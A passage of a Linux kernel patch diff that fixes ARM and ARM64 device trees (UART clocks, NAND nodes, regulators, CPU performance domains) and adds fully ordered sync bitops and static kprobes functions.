+ 		clocks = <&iprocmed>;
+-		clock-names = "iprocmed";
+ 		num-cs = <2>;
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm/boot/dts/iwg20d-q7-common.dtsi b/arch/arm/boot/dts/iwg20d-q7-common.dtsi
+index 03caea6fc6ffa..4351c5a02fa59 100644
+--- a/arch/arm/boot/dts/iwg20d-q7-common.dtsi
++++ b/arch/arm/boot/dts/iwg20d-q7-common.dtsi
+@@ -49,7 +49,7 @@
+ 	lcd_backlight: backlight {
+ 		compatible = "pwm-backlight";
+ 
+-		pwms = <&pwm3 0 5000000 0>;
++		pwms = <&pwm3 0 5000000>;
+ 		brightness-levels = <0 4 8 16 32 64 128 255>;
+ 		default-brightness-level = <7>;
+ 		enable-gpios = <&gpio5 14 GPIO_ACTIVE_HIGH>;
+diff --git a/arch/arm/boot/dts/lan966x-kontron-kswitch-d10-mmt.dtsi b/arch/arm/boot/dts/lan966x-kontron-kswitch-d10-mmt.dtsi
+index 0097e72e3fb22..f4df4cc1dfa5e 100644
+--- a/arch/arm/boot/dts/lan966x-kontron-kswitch-d10-mmt.dtsi
++++ b/arch/arm/boot/dts/lan966x-kontron-kswitch-d10-mmt.dtsi
+@@ -18,6 +18,8 @@
+ 
+ 	gpio-restart {
+ 		compatible = "gpio-restart";
++		pinctrl-0 = <&reset_pins>;
++		pinctrl-names = "default";
+ 		gpios = <&gpio 56 GPIO_ACTIVE_LOW>;
+ 		priority = <200>;
+ 	};
+@@ -39,7 +41,7 @@
+ 	status = "okay";
+ 
+ 	spi3: spi@400 {
+-		pinctrl-0 = <&fc3_b_pins>;
++		pinctrl-0 = <&fc3_b_pins>, <&spi3_cs_pins>;
+ 		pinctrl-names = "default";
+ 		status = "okay";
+ 		cs-gpios = <&gpio 46 GPIO_ACTIVE_LOW>;
+@@ -59,6 +61,12 @@
+ 		function = "miim_c";
+ 	};
+ 
++	reset_pins: reset-pins {
++		/* SYS_RST# */
++		pins = "GPIO_56";
++		function = "gpio";
++	};
++
+ 	sgpio_a_pins: sgpio-a-pins {
+ 		/* SCK, D0, D1 */
+ 		pins = "GPIO_32", "GPIO_33", "GPIO_34";
+@@ -71,6 +79,12 @@
+ 		function = "sgpio_b";
+ 	};
+ 
++	spi3_cs_pins: spi3-cs-pins {
++		/* CS# */
++		pins = "GPIO_46";
++		function = "gpio";
++	};
++
+ 	usart0_pins: usart0-pins {
+ 		/* RXD, TXD */
+ 		pins = "GPIO_25", "GPIO_26";
+diff --git a/arch/arm/boot/dts/meson8.dtsi b/arch/arm/boot/dts/meson8.dtsi
+index 0f8bac8bac8bb..f9da7faa2186b 100644
+--- a/arch/arm/boot/dts/meson8.dtsi
++++ b/arch/arm/boot/dts/meson8.dtsi
+@@ -749,13 +749,13 @@
+ 
+ &uart_B {
+ 	compatible = "amlogic,meson8-uart";
+-	clocks = <&xtal>, <&clkc CLKID_UART0>, <&clkc CLKID_CLK81>;
++	clocks = <&xtal>, <&clkc CLKID_UART1>, <&clkc CLKID_CLK81>;
+ 	clock-names = "xtal", "pclk", "baud";
+ };
+ 
+ &uart_C {
+ 	compatible = "amlogic,meson8-uart";
+-	clocks = <&xtal>, <&clkc CLKID_UART0>, <&clkc CLKID_CLK81>;
++	clocks = <&xtal>, <&clkc CLKID_UART2>, <&clkc CLKID_CLK81>;
+ 	clock-names = "xtal", "pclk", "baud";
+ };
+ 
+diff --git a/arch/arm/boot/dts/meson8b.dtsi b/arch/arm/boot/dts/meson8b.dtsi
+index cf9c04a61ba3c..d3e0f085904db 100644
+--- a/arch/arm/boot/dts/meson8b.dtsi
++++ b/arch/arm/boot/dts/meson8b.dtsi
+@@ -737,13 +737,13 @@
+ 
+ &uart_B {
+ 	compatible = "amlogic,meson8b-uart";
+-	clocks = <&xtal>, <&clkc CLKID_UART0>, <&clkc CLKID_CLK81>;
++	clocks = <&xtal>, <&clkc CLKID_UART1>, <&clkc CLKID_CLK81>;
+ 	clock-names = "xtal", "pclk", "baud";
+ };
+ 
+ &uart_C {
+ 	compatible = "amlogic,meson8b-uart";
+-	clocks = <&xtal>, <&clkc CLKID_UART0>, <&clkc CLKID_CLK81>;
++	clocks = <&xtal>, <&clkc CLKID_UART2>, <&clkc CLKID_CLK81>;
+ 	clock-names = "xtal", "pclk", "baud";
+ };
+ 
+diff --git a/arch/arm/boot/dts/omap3-gta04a5one.dts b/arch/arm/boot/dts/omap3-gta04a5one.dts
+index 9db9fe67cd63b..95df45cc70c09 100644
+--- a/arch/arm/boot/dts/omap3-gta04a5one.dts
++++ b/arch/arm/boot/dts/omap3-gta04a5one.dts
+@@ -5,9 +5,11 @@
+ 
+ #include "omap3-gta04a5.dts"
+ 
+-&omap3_pmx_core {
++/ {
+ 	model = "Goldelico GTA04A5/Letux 2804 with OneNAND";
++};
+ 
++&omap3_pmx_core {
+ 	gpmc_pins: pinmux_gpmc_pins {
+ 		pinctrl-single,pins = <
+ 
+diff --git a/arch/arm/boot/dts/qcom-apq8074-dragonboard.dts b/arch/arm/boot/dts/qcom-apq8074-dragonboard.dts
+index 91716298ec5ed..be1ab7eff8ff4 100644
+--- a/arch/arm/boot/dts/qcom-apq8074-dragonboard.dts
++++ b/arch/arm/boot/dts/qcom-apq8074-dragonboard.dts
+@@ -23,6 +23,10 @@
+ 	status = "okay";
+ };
+ 
++&blsp2_dma {
++	qcom,controlled-remotely;
++};
++
+ &blsp2_i2c5 {
+ 	status = "okay";
+ 	clock-frequency = <200000>;
+diff --git a/arch/arm/boot/dts/qcom-ipq4019-ap.dk04.1-c1.dts b/arch/arm/boot/dts/qcom-ipq4019-ap.dk04.1-c1.dts
+index 79b0c6318e527..0993f840d1fc7 100644
+--- a/arch/arm/boot/dts/qcom-ipq4019-ap.dk04.1-c1.dts
++++ b/arch/arm/boot/dts/qcom-ipq4019-ap.dk04.1-c1.dts
+@@ -11,9 +11,9 @@
+ 		dma-controller@7984000 {
+ 			status = "okay";
+ 		};
+-
+-		qpic-nand@79b0000 {
+-			status = "okay";
+-		};
+ 	};
+ };
++
++&nand {
++	status = "okay";
++};
+diff --git a/arch/arm/boot/dts/qcom-ipq4019-ap.dk04.1.dtsi b/arch/arm/boot/dts/qcom-ipq4019-ap.dk04.1.dtsi
+index a63b3778636d4..468ebc40d2ad3 100644
+--- a/arch/arm/boot/dts/qcom-ipq4019-ap.dk04.1.dtsi
++++ b/arch/arm/boot/dts/qcom-ipq4019-ap.dk04.1.dtsi
+@@ -102,10 +102,10 @@
+ 			status = "okay";
+ 			perst-gpios = <&tlmm 38 GPIO_ACTIVE_LOW>;
+ 		};
+-
+-		qpic-nand@79b0000 {
+-			pinctrl-0 = <&nand_pins>;
+-			pinctrl-names = "default";
+-		};
+ 	};
+ };
++
++&nand {
++	pinctrl-0 = <&nand_pins>;
++	pinctrl-names = "default";
++};
+diff --git a/arch/arm/boot/dts/qcom-ipq4019-ap.dk07.1.dtsi b/arch/arm/boot/dts/qcom-ipq4019-ap.dk07.1.dtsi
+index 0107f552f5204..7ef635997efa4 100644
+--- a/arch/arm/boot/dts/qcom-ipq4019-ap.dk07.1.dtsi
++++ b/arch/arm/boot/dts/qcom-ipq4019-ap.dk07.1.dtsi
+@@ -65,11 +65,11 @@
+ 		dma-controller@7984000 {
+ 			status = "okay";
+ 		};
+-
+-		qpic-nand@79b0000 {
+-			pinctrl-0 = <&nand_pins>;
+-			pinctrl-names = "default";
+-			status = "okay";
+-		};
+ 	};
+ };
++
++&nand {
++	pinctrl-0 = <&nand_pins>;
++	pinctrl-names = "default";
++	status = "okay";
++};
+diff --git a/arch/arm/boot/dts/qcom-msm8974.dtsi b/arch/arm/boot/dts/qcom-msm8974.dtsi
+index 7a9be0acf3f5a..c4b2e9ac24940 100644
+--- a/arch/arm/boot/dts/qcom-msm8974.dtsi
++++ b/arch/arm/boot/dts/qcom-msm8974.dtsi
+@@ -300,7 +300,7 @@
+ 			qcom,ipc = <&apcs 8 0>;
+ 			qcom,smd-edge = <15>;
+ 
+-			rpm_requests: rpm_requests {
++			rpm_requests: rpm-requests {
+ 				compatible = "qcom,rpm-msm8974";
+ 				qcom,smd-channels = "rpm_requests";
+ 
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcom-pdk2.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcom-pdk2.dtsi
+index 5f586f024060f..38f46c2c83aa6 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcom-pdk2.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcom-pdk2.dtsi
+@@ -137,10 +137,13 @@
+ 
+ 	sound {
+ 		compatible = "audio-graph-card";
+-		routing =
+-			"MIC_IN", "Capture",
+-			"Capture", "Mic Bias",
+-			"Playback", "HP_OUT";
++		widgets = "Headphone", "Headphone Jack",
++			  "Line", "Line In Jack",
++			  "Microphone", "Microphone Jack";
++		routing = "Headphone Jack", "HP_OUT",
++			  "LINE_IN", "Line In Jack",
++			  "MIC_IN", "Microphone Jack",
++			  "Microphone Jack", "Mic Bias";
+ 		dais = <&sai2a_port &sai2b_port>;
+ 		status = "okay";
+ 	};
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
+index b6957cbdeff5f..f068e4fcc404f 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
+@@ -88,7 +88,7 @@
+ 
+ 	sound {
+ 		compatible = "audio-graph-card";
+-		label = "STM32MP1-AV96-HDMI";
++		label = "STM32-AV96-HDMI";
+ 		dais = <&sai2a_port>;
+ 		status = "okay";
+ 	};
+@@ -322,6 +322,12 @@
+ 			};
+ 		};
+ 	};
++
++	dh_mac_eeprom: eeprom@53 {
++		compatible = "atmel,24c02";
++		reg = <0x53>;
++		pagesize = <16>;
++	};
+ };
+ 
+ &ltdc {
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcor-drc-compact.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcor-drc-compact.dtsi
+index 27477bb219ded..bb4ac6c13cbd3 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcor-drc-compact.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcor-drc-compact.dtsi
+@@ -192,6 +192,12 @@
+ 		reg = <0x50>;
+ 		pagesize = <16>;
+ 	};
++
++	dh_mac_eeprom: eeprom@53 {
++		compatible = "atmel,24c02";
++		reg = <0x53>;
++		pagesize = <16>;
++	};
+ };
+ 
+ &sdmmc1 {	/* MicroSD */
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcor-som.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcor-som.dtsi
+index bb40fb46da81d..bba19f21e5277 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcor-som.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcor-som.dtsi
+@@ -213,12 +213,6 @@
+ 			status = "disabled";
+ 		};
+ 	};
+-
+-	eeprom@53 {
+-		compatible = "atmel,24c02";
+-		reg = <0x53>;
+-		pagesize = <16>;
+-	};
+ };
+ 
+ &ipcc {
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dkx.dtsi b/arch/arm/boot/dts/stm32mp15xx-dkx.dtsi
+index 8b48d3c89a047..fdc48536e97d1 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dkx.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dkx.dtsi
+@@ -438,7 +438,7 @@
+ 	i2s2_port: port {
+ 		i2s2_endpoint: endpoint {
+ 			remote-endpoint = <&sii9022_tx_endpoint>;
+-			format = "i2s";
++			dai-format = "i2s";
+ 			mclk-fs = <256>;
+ 		};
+ 	};
+diff --git a/arch/arm/include/asm/assembler.h b/arch/arm/include/asm/assembler.h
+index 90fbe4a3f9c84..84912b19cac85 100644
+--- a/arch/arm/include/asm/assembler.h
++++ b/arch/arm/include/asm/assembler.h
+@@ -402,6 +402,23 @@ ALT_UP_B(.L0_\@)
+ #endif
+ 	.endm
+ 
++/*
++ * Raw SMP data memory barrier
++ */
++	.macro	__smp_dmb mode
++#if __LINUX_ARM_ARCH__ >= 7
++	.ifeqs "\mode","arm"
++	dmb	ish
++	.else
++	W(dmb)	ish
++	.endif
++#elif __LINUX_ARM_ARCH__ == 6
++	mcr	p15, 0, r0, c7, c10, 5	@ dmb
++#else
++	.error "Incompatible SMP platform"
++#endif
++	.endm
++
+ #if defined(CONFIG_CPU_V7M)
+ 	/*
+ 	 * setmode is used to assert to be in svc mode during boot. For v7-M
+diff --git a/arch/arm/include/asm/sync_bitops.h b/arch/arm/include/asm/sync_bitops.h
+index 6f5d627c44a3c..f46b3c570f92e 100644
+--- a/arch/arm/include/asm/sync_bitops.h
++++ b/arch/arm/include/asm/sync_bitops.h
+@@ -14,14 +14,35 @@
+  * ops which are SMP safe even on a UP kernel.
+  */
+ 
++/*
++ * Unordered
++ */
++
+ #define sync_set_bit(nr, p)		_set_bit(nr, p)
+ #define sync_clear_bit(nr, p)		_clear_bit(nr, p)
+ #define sync_change_bit(nr, p)		_change_bit(nr, p)
+-#define sync_test_and_set_bit(nr, p)	_test_and_set_bit(nr, p)
+-#define sync_test_and_clear_bit(nr, p)	_test_and_clear_bit(nr, p)
+-#define sync_test_and_change_bit(nr, p)	_test_and_change_bit(nr, p)
+ #define sync_test_bit(nr, addr)		test_bit(nr, addr)
+-#define arch_sync_cmpxchg		arch_cmpxchg
+ 
++/*
++ * Fully ordered
++ */
++
++int _sync_test_and_set_bit(int nr, volatile unsigned long * p);
++#define sync_test_and_set_bit(nr, p)	_sync_test_and_set_bit(nr, p)
++
++int _sync_test_and_clear_bit(int nr, volatile unsigned long * p);
++#define sync_test_and_clear_bit(nr, p)	_sync_test_and_clear_bit(nr, p)
++
++int _sync_test_and_change_bit(int nr, volatile unsigned long * p);
++#define sync_test_and_change_bit(nr, p)	_sync_test_and_change_bit(nr, p)
++
++#define arch_sync_cmpxchg(ptr, old, new)				\
++({									\
++	__typeof__(*(ptr)) __ret;					\
++	__smp_mb__before_atomic();					\
++	__ret = arch_cmpxchg_relaxed((ptr), (old), (new));		\
++	__smp_mb__after_atomic();					\
++	__ret;								\
++})
+ 
+ #endif
+diff --git a/arch/arm/lib/bitops.h b/arch/arm/lib/bitops.h
+index 95bd359912889..f069d1b2318e6 100644
+--- a/arch/arm/lib/bitops.h
++++ b/arch/arm/lib/bitops.h
+@@ -28,7 +28,7 @@ UNWIND(	.fnend		)
+ ENDPROC(\name		)
+ 	.endm
+ 
+-	.macro	testop, name, instr, store
++	.macro	__testop, name, instr, store, barrier
+ ENTRY(	\name		)
+ UNWIND(	.fnstart	)
+ 	ands	ip, r1, #3
+@@ -38,7 +38,7 @@ UNWIND(	.fnstart	)
+ 	mov	r0, r0, lsr #5
+ 	add	r1, r1, r0, lsl #2	@ Get word offset
+ 	mov	r3, r2, lsl r3		@ create mask
+-	smp_dmb
++	\barrier
+ #if __LINUX_ARM_ARCH__ >= 7 && defined(CONFIG_SMP)
+ 	.arch_extension	mp
+ 	ALT_SMP(W(pldw)	[r1])
+@@ -50,13 +50,21 @@ UNWIND(	.fnstart	)
+ 	strex	ip, r2, [r1]
+ 	cmp	ip, #0
+ 	bne	1b
+-	smp_dmb
++	\barrier
+ 	cmp	r0, #0
+ 	movne	r0, #1
+ 2:	bx	lr
+ UNWIND(	.fnend		)
+ ENDPROC(\name		)
+ 	.endm
++
++	.macro	testop, name, instr, store
++	__testop \name, \instr, \store, smp_dmb
++	.endm
++
++	.macro	sync_testop, name, instr, store
++	__testop \name, \instr, \store, __smp_dmb
++	.endm
+ #else
+ 	.macro	bitop, name, instr
+ ENTRY(	\name		)
+diff --git a/arch/arm/lib/testchangebit.S b/arch/arm/lib/testchangebit.S
+index 4ebecc67e6e04..f13fe9bc2399a 100644
+--- a/arch/arm/lib/testchangebit.S
++++ b/arch/arm/lib/testchangebit.S
+@@ -10,3 +10,7 @@
+                 .text
+ 
+ testop	_test_and_change_bit, eor, str
++
++#if __LINUX_ARM_ARCH__ >= 6
++sync_testop	_sync_test_and_change_bit, eor, str
++#endif
+diff --git a/arch/arm/lib/testclearbit.S b/arch/arm/lib/testclearbit.S
+index 009afa0f5b4a7..4d2c5ca620ebf 100644
+--- a/arch/arm/lib/testclearbit.S
++++ b/arch/arm/lib/testclearbit.S
+@@ -10,3 +10,7 @@
+                 .text
+ 
+ testop	_test_and_clear_bit, bicne, strne
++
++#if __LINUX_ARM_ARCH__ >= 6
++sync_testop	_sync_test_and_clear_bit, bicne, strne
++#endif
+diff --git a/arch/arm/lib/testsetbit.S b/arch/arm/lib/testsetbit.S
+index f3192e55acc87..649dbab65d8d0 100644
+--- a/arch/arm/lib/testsetbit.S
++++ b/arch/arm/lib/testsetbit.S
+@@ -10,3 +10,7 @@
+                 .text
+ 
+ testop	_test_and_set_bit, orreq, streq
++
++#if __LINUX_ARM_ARCH__ >= 6
++sync_testop	_sync_test_and_set_bit, orreq, streq
++#endif
+diff --git a/arch/arm/mach-ep93xx/timer-ep93xx.c b/arch/arm/mach-ep93xx/timer-ep93xx.c
+index dd4b164d18317..a9efa7bc2fa12 100644
+--- a/arch/arm/mach-ep93xx/timer-ep93xx.c
++++ b/arch/arm/mach-ep93xx/timer-ep93xx.c
+@@ -9,6 +9,7 @@
+ #include <linux/io.h>
+ #include <asm/mach/time.h>
+ #include "soc.h"
++#include "platform.h"
+ 
+ /*************************************************************************
+  * Timer handling for EP93xx
+@@ -60,7 +61,7 @@ static u64 notrace ep93xx_read_sched_clock(void)
+ 	return ret;
+ }
+ 
+-u64 ep93xx_clocksource_read(struct clocksource *c)
++static u64 ep93xx_clocksource_read(struct clocksource *c)
+ {
+ 	u64 ret;
+ 
+diff --git a/arch/arm/mach-omap2/board-generic.c b/arch/arm/mach-omap2/board-generic.c
+index 1610c567a6a3a..10d2f078e4a8e 100644
+--- a/arch/arm/mach-omap2/board-generic.c
++++ b/arch/arm/mach-omap2/board-generic.c
+@@ -13,6 +13,7 @@
+ #include <linux/of_platform.h>
+ #include <linux/irqdomain.h>
+ #include <linux/clocksource.h>
++#include <linux/clockchips.h>
+ 
+ #include <asm/setup.h>
+ #include <asm/mach/arch.h>
+diff --git a/arch/arm/mach-orion5x/board-dt.c b/arch/arm/mach-orion5x/board-dt.c
+index e3736ffc83477..be47492c6640d 100644
+--- a/arch/arm/mach-orion5x/board-dt.c
++++ b/arch/arm/mach-orion5x/board-dt.c
+@@ -60,6 +60,9 @@ static void __init orion5x_dt_init(void)
+ 	if (of_machine_is_compatible("maxtor,shared-storage-2"))
+ 		mss2_init();
+ 
++	if (of_machine_is_compatible("lacie,d2-network"))
++		d2net_init();
++
+ 	of_platform_default_populate(NULL, orion5x_auxdata_lookup, NULL);
+ }
+ 
+diff --git a/arch/arm/mach-orion5x/common.h b/arch/arm/mach-orion5x/common.h
+index eb96009e21c4c..b9cfdb4564568 100644
+--- a/arch/arm/mach-orion5x/common.h
++++ b/arch/arm/mach-orion5x/common.h
+@@ -75,6 +75,12 @@ extern void mss2_init(void);
+ static inline void mss2_init(void) {}
+ #endif
+ 
++#ifdef CONFIG_MACH_D2NET_DT
++void d2net_init(void);
++#else
++static inline void d2net_init(void) {}
++#endif
++
+ /*****************************************************************************
+  * Helpers to access Orion registers
+  ****************************************************************************/
+diff --git a/arch/arm/probes/kprobes/checkers-common.c b/arch/arm/probes/kprobes/checkers-common.c
+index 4d720990cf2a3..eba7ac4725c02 100644
+--- a/arch/arm/probes/kprobes/checkers-common.c
++++ b/arch/arm/probes/kprobes/checkers-common.c
+@@ -40,7 +40,7 @@ enum probes_insn checker_stack_use_imm_0xx(probes_opcode_t insn,
+  * Different from other insn uses imm8, the real addressing offset of
+  * STRD in T32 encoding should be imm8 * 4. See ARMARM description.
+  */
+-enum probes_insn checker_stack_use_t32strd(probes_opcode_t insn,
++static enum probes_insn checker_stack_use_t32strd(probes_opcode_t insn,
+ 		struct arch_probes_insn *asi,
+ 		const struct decode_header *h)
+ {
+diff --git a/arch/arm/probes/kprobes/core.c b/arch/arm/probes/kprobes/core.c
+index 9090c3a74dcce..d8238da095df7 100644
+--- a/arch/arm/probes/kprobes/core.c
++++ b/arch/arm/probes/kprobes/core.c
+@@ -233,7 +233,7 @@ singlestep(struct kprobe *p, struct pt_regs *regs, struct kprobe_ctlblk *kcb)
+  * kprobe, and that level is reserved for user kprobe handlers, so we can't
+  * risk encountering a new kprobe in an interrupt handler.
+  */
+-void __kprobes kprobe_handler(struct pt_regs *regs)
++static void __kprobes kprobe_handler(struct pt_regs *regs)
+ {
+ 	struct kprobe *p, *cur;
+ 	struct kprobe_ctlblk *kcb;
+diff --git a/arch/arm/probes/kprobes/opt-arm.c b/arch/arm/probes/kprobes/opt-arm.c
+index dbef34ed933f2..7f65048380ca5 100644
+--- a/arch/arm/probes/kprobes/opt-arm.c
++++ b/arch/arm/probes/kprobes/opt-arm.c
+@@ -145,8 +145,6 @@ __arch_remove_optimized_kprobe(struct optimized_kprobe *op, int dirty)
+ 	}
+ }
+ 
+-extern void kprobe_handler(struct pt_regs *regs);
+-
+ static void
+ optimized_callback(struct optimized_kprobe *op, struct pt_regs *regs)
+ {
+diff --git a/arch/arm/probes/kprobes/test-core.c b/arch/arm/probes/kprobes/test-core.c
+index c562832b86272..171c7076b89f4 100644
+--- a/arch/arm/probes/kprobes/test-core.c
++++ b/arch/arm/probes/kprobes/test-core.c
+@@ -720,7 +720,7 @@ static const char coverage_register_lookup[16] = {
+ 	[REG_TYPE_NOSPPCX]	= COVERAGE_ANY_REG | COVERAGE_SP,
+ };
+ 
+-unsigned coverage_start_registers(const struct decode_header *h)
++static unsigned coverage_start_registers(const struct decode_header *h)
+ {
+ 	unsigned regs = 0;
+ 	int i;
+diff --git a/arch/arm/probes/kprobes/test-core.h b/arch/arm/probes/kprobes/test-core.h
+index 56ad3c0aaeeac..c7297037c1623 100644
+--- a/arch/arm/probes/kprobes/test-core.h
++++ b/arch/arm/probes/kprobes/test-core.h
+@@ -454,3 +454,7 @@ void kprobe_thumb32_test_cases(void);
+ #else
+ void kprobe_arm_test_cases(void);
+ #endif
++
++void __kprobes_test_case_start(void);
++void __kprobes_test_case_end_16(void);
++void __kprobes_test_case_end_32(void);
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
+index b4b86bb1f1a7d..632fd89e75969 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
+@@ -297,6 +297,10 @@
+ 	};
+ };
+ 
++&gic {
++	mediatek,broken-save-restore-fw;
++};
++
+ &gpu {
+ 	mali-supply = <&mt6358_vgpu_reg>;
+ 	sram-supply = <&mt6358_vsram_gpu_reg>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192.dtsi b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+index ef1294d960145..2f40c6cc407c1 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+@@ -64,7 +64,8 @@
+ 			clock-frequency = <1701000000>;
+ 			cpu-idle-states = <&cpu_sleep_l &cluster_sleep_l>;
+ 			next-level-cache = <&l2_0>;
+-			capacity-dmips-mhz = <530>;
++			performance-domains = <&performance 0>;
++			capacity-dmips-mhz = <427>;
+ 		};
+ 
+ 		cpu1: cpu@100 {
+@@ -75,7 +76,8 @@
+ 			clock-frequency = <1701000000>;
+ 			cpu-idle-states = <&cpu_sleep_l &cluster_sleep_l>;
+ 			next-level-cache = <&l2_0>;
+-			capacity-dmips-mhz = <530>;
++			performance-domains = <&performance 0>;
++			capacity-dmips-mhz = <427>;
+ 		};
+ 
+ 		cpu2: cpu@200 {
+@@ -86,7 +88,8 @@
+ 			clock-frequency = <1701000000>;
+ 			cpu-idle-states = <&cpu_sleep_l &cluster_sleep_l>;
+ 			next-level-cache = <&l2_0>;
+-			capacity-dmips-mhz = <530>;
++			performance-domains = <&performance 0>;
++			capacity-dmips-mhz = <427>;
+ 		};
+ 
+ 		cpu3: cpu@300 {
+@@ -97,7 +100,8 @@
+ 			clock-frequency = <1701000000>;
+ 			cpu-idle-states = <&cpu_sleep_l &cluster_sleep_l>;
+ 			next-level-cache = <&l2_0>;
+-			capacity-dmips-mhz = <530>;
++			performance-domains = <&performance 0>;
++			capacity-dmips-mhz = <427>;
+ 		};
+ 
+ 		cpu4: cpu@400 {
+@@ -108,6 +112,7 @@
+ 			clock-frequency = <2171000000>;
+ 			cpu-idle-states = <&cpu_sleep_b &cluster_sleep_b>;
+ 			next-level-cache = <&l2_1>;
++			performance-domains = <&performance 1>;
+ 			capacity-dmips-mhz = <1024>;
+ 		};
+ 
+@@ -119,6 +124,7 @@
+ 			clock-frequency = <2171000000>;
+ 			cpu-idle-states = <&cpu_sleep_b &cluster_sleep_b>;
+ 			next-level-cache = <&l2_1>;
++			performance-domains = <&performance 1>;
+ 			capacity-dmips-mhz = <1024>;
+ 		};
+ 
+@@ -130,6 +136,7 @@
+ 			clock-frequency = <2171000000>;
+ 			cpu-idle-states = <&cpu_sleep_b &cluster_sleep_b>;
+ 			next-level-cache = <&l2_1>;
++			performance-domains = <&performance 1>;
+ 			capacity-dmips-mhz = <1024>;
+ 		};
+ 
+@@ -141,6 +148,7 @@
+ 			clock-frequency = <2171000000>;
+ 			cpu-idle-states = <&cpu_sleep_b &cluster_sleep_b>;
+ 			next-level-cache = <&l2_1>;
++			performance-domains = <&performance 1>;
+ 			capacity-dmips-mhz = <1024>;
+ 		};
+ 
+@@ -257,6 +265,12 @@
+ 		compatible = "simple-bus";
+ 		ranges;
+ 
++		performance: performance-controller@11bc10 {
++			compatible = "mediatek,cpufreq-hw";
++			reg = <0 0x0011bc10 0 0x120>, <0 0x0011bd30 0 0x120>;
++			#performance-domain-cells = <1>;
++		};
++
+ 		gic: interrupt-controller@c000000 {
+ 			compatible = "arm,gic-v3";
+ 			#interrupt-cells = <4>;
+diff --git a/arch/arm64/boot/dts/microchip/sparx5.dtsi b/arch/arm64/boot/dts/microchip/sparx5.dtsi
+index 2dd5e38820b16..088d89801c276 100644
+--- a/arch/arm64/boot/dts/microchip/sparx5.dtsi
++++ b/arch/arm64/boot/dts/microchip/sparx5.dtsi
+@@ -61,7 +61,7 @@
+ 		interrupt-affinity = <&cpu0>, <&cpu1>;
+ 	};
+ 
+-	psci {
++	psci: psci {
+ 		compatible = "arm,psci-0.2";
+ 		method = "smc";
+ 	};
+diff --git a/arch/arm64/boot/dts/microchip/sparx5_pcb_common.dtsi b/arch/arm64/boot/dts/microchip/sparx5_pcb_common.dtsi
+index 9d1a082de3e29..32bb76b3202a0 100644
+--- a/arch/arm64/boot/dts/microchip/sparx5_pcb_common.dtsi
++++ b/arch/arm64/boot/dts/microchip/sparx5_pcb_common.dtsi
+@@ -6,6 +6,18 @@
+ /dts-v1/;
+ #include "sparx5.dtsi"
+ 
++&psci {
++	status = "disabled";
++};
++
++&cpu0 {
++	enable-method = "spin-table";
++};
++
++&cpu1 {
++	enable-method = "spin-table";
++};
++
+ &uart0 {
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/qcom/apq8016-sbc.dts b/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
+index 1b613098fb4a0..e3e90ad92cc59 100644
+--- a/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
++++ b/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
+@@ -448,21 +448,21 @@
+ 	vdd_l7-supply = <&pm8916_s4>;
+ 
+ 	s3 {
+-		regulator-min-microvolt = <375000>;
+-		regulator-max-microvolt = <1562000>;
++		regulator-min-microvolt = <1250000>;
++		regulator-max-microvolt = <1350000>;
+ 	};
+ 
+ 	s4 {
+-		regulator-min-microvolt = <1800000>;
+-		regulator-max-microvolt = <1800000>;
++		regulator-min-microvolt = <1850000>;
++		regulator-max-microvolt = <2150000>;
+ 
+ 		regulator-always-on;
+ 		regulator-boot-on;
+ 	};
+ 
+ 	l1 {
+-		regulator-min-microvolt = <375000>;
+-		regulator-max-microvolt = <1525000>;
++		regulator-min-microvolt = <1225000>;
++		regulator-max-microvolt = <1225000>;
+ 	};
+ 
+ 	l2 {
+@@ -471,13 +471,13 @@
+ 	};
+ 
+ 	l4 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <2050000>;
++		regulator-max-microvolt = <2050000>;
+ 	};
+ 
+ 	l5 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <1800000>;
++		regulator-max-microvolt = <1800000>;
+ 	};
+ 
+ 	l6 {
+@@ -486,60 +486,68 @@
+ 	};
+ 
+ 	l7 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <1800000>;
++		regulator-max-microvolt = <1800000>;
+ 	};
+ 
+ 	l8 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <2900000>;
++		regulator-max-microvolt = <2900000>;
+ 	};
+ 
+ 	l9 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <3300000>;
++		regulator-max-microvolt = <3300000>;
+ 	};
+ 
+ 	l10 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
